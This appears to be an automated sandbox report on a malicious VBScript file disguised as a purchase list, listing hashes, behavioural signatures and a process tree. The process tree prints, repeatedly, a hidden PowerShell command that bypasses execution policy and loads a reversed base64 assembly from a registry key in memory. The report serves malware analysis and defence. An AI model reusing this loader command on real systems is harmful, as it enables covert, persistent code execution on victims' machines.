Analysis
-
max time kernel
143s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28/02/2025, 11:02
Static task
static1
Behavioral task
behavioral1
Sample
purchase list #8479734734-8843947347_____________________________.vbe
Resource
win7-20240903-en
General
-
Target
purchase list #8479734734-8843947347_____________________________.vbe
-
Size
24KB
-
MD5
5aea1615d1872e876da66200bc9e47fa
-
SHA1
6fe3576517885705735762ff060e9068fd9fdbe9
-
SHA256
c9a42d3cb9f1ff79d28112275dd9d598daa429c81912c171401fce5594f1f515
-
SHA512
68a87c1bbbf107714634af224b46a02252c8fd7e3799dee8fa36e4e064be07f2e51e4fab20591d7e6e05de769a4aac7ae59ef3b70e95cd3b6cec77d028a05ccd
-
SSDEEP
192:Lh1qAagTqDNmlc1sN+uc4f9caUxarPlP1K:qMqDAlnoP4VcaUxarK
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 1 2548 WScript.exe 3 2548 WScript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell and hide display window.
pid Process 920 powershell.exe 1608 powershell.exe 2836 powershell.exe 564 powershell.exe 1804 powershell.exe 2920 powershell.exe 1780 powershell.exe 2100 powershell.exe 1868 powershell.exe 2892 powershell.exe 2160 powershell.exe -
Drops file in System32 directory 10 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2836 powershell.exe 564 powershell.exe 1804 powershell.exe 2920 powershell.exe 2160 powershell.exe 920 powershell.exe 1780 powershell.exe 2100 powershell.exe 1608 powershell.exe 1868 powershell.exe 2892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 564 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 2160 powershell.exe Token: SeDebugPrivilege 920 powershell.exe Token: SeDebugPrivilege 1780 powershell.exe Token: SeDebugPrivilege 2100 powershell.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 2892 powershell.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2548 wrote to memory of 2836 2548 WScript.exe 32 PID 2548 wrote to memory of 2836 2548 WScript.exe 32 PID 2548 wrote to memory of 2836 2548 WScript.exe 32 PID 2668 wrote to memory of 2000 2668 taskeng.exe 35 PID 2668 wrote to memory of 2000 2668 taskeng.exe 35 PID 2668 wrote to memory of 2000 2668 taskeng.exe 35 PID 2000 wrote to memory of 564 2000 WScript.exe 37 PID 2000 wrote to memory of 564 2000 WScript.exe 37 PID 2000 wrote to memory of 564 2000 WScript.exe 37 PID 2000 wrote to memory of 1804 2000 WScript.exe 39 PID 2000 wrote to memory of 1804 2000 WScript.exe 39 PID 2000 wrote to memory of 1804 2000 WScript.exe 39 PID 2000 wrote to memory of 2920 2000 WScript.exe 41 PID 2000 wrote to memory of 2920 2000 WScript.exe 41 PID 2000 wrote to memory of 2920 2000 WScript.exe 41 PID 2000 wrote to memory of 2160 2000 WScript.exe 43 PID 2000 wrote to memory of 2160 2000 WScript.exe 43 PID 2000 wrote to memory of 2160 2000 WScript.exe 43 PID 2000 wrote to memory of 920 2000 WScript.exe 45 PID 2000 wrote to memory of 920 2000 WScript.exe 45 PID 2000 wrote to memory of 920 2000 WScript.exe 45 PID 2000 wrote to memory of 1780 2000 WScript.exe 47 PID 2000 wrote to memory of 1780 2000 WScript.exe 47 PID 2000 wrote to memory of 1780 2000 WScript.exe 47 PID 2000 wrote to memory of 2100 2000 WScript.exe 49 PID 2000 wrote to memory of 2100 2000 WScript.exe 49 PID 2000 wrote to memory of 2100 2000 WScript.exe 49 PID 2000 wrote to memory of 1608 2000 WScript.exe 51 PID 2000 wrote to memory of 1608 2000 WScript.exe 51 PID 2000 wrote to memory of 1608 2000 WScript.exe 51 PID 2000 wrote to memory of 1868 2000 WScript.exe 53 PID 2000 wrote to memory of 1868 2000 WScript.exe 53 PID 2000 wrote to memory of 1868 2000 WScript.exe 53 PID 2000 wrote to memory of 2892 2000 WScript.exe 55 PID 2000 wrote to memory of 2892 2000 WScript.exe 55 PID 2000 wrote to memory of 2892 2000 WScript.exe 55 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\purchase list #8479734734-8843947347_____________________________.vbe"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {931EDB12-B402-428E-9EB5-C26F6A66D6E8} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\NforSjIryOoBaoP.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\80LSVT8G81JI6CDALJ6M.temp
Filesize7KB
MD5e98f52c319ce9669bd2771bc02edecdb
SHA1e96eb0a66646cce86cab807782d9040944d549c9
SHA256481c7365a7ab1811505873a7f746c4c460ada3d671a2a540aad1d76685d18ec8
SHA51279dad58cc64ae84a8efdbce8bb5d58f43c82ac2d9a26b14cb9e76ab57e4df128200147c8a4680410c14bc360406b04f2d53f10162970a92f0b65d13631e6787a
-
Filesize
2KB
MD5361b0dd2b7993fe7d36caa709dfa9438
SHA1ffd8de4adc4f2850d5b0ae4af21dd2fbd0a75d8d
SHA256ce725c50b0c8b66e12fc51e3673869d069160278a05ac5c4e8c2d278551cf78f
SHA51270537e86d38b45782c6db967bc963c2f09c1fec2c217f58dec21b3e4ea18f1fbf35ed5519a0f3eaf82d87f69ce5bc2c901361fae297d1c0a6bb7ca161d0355a3